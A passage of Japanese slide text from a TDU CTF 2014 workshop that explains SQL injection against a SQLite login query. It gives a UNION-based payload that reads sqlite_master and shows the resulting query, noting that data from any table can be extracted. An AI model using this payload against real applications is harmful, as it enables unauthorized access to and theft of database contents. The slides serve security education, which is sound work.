TDU CTF 2014Satellite in ConoHa
HashTag - #tductf
こんな値を送信する
●
「' union all select 1,sql,1 from sqlite_master;--」
→データベース内に登録されている全てが表示された後,sql文
が表示される.
●
なお,ここではsqliteを想定します
45.
TDU CTF 2014Satellite in ConoHa
HashTag - #tductf
Demo
46.
TDU CTF 2014Satellite in ConoHa
HashTag - #tductf
何が起きた?
●
クエリに注目
SELECT * FROM users WHERE id='' union all select 1,sql,1
from sqlite_master;--';
●
任意のテーブルからデータを取り出せた!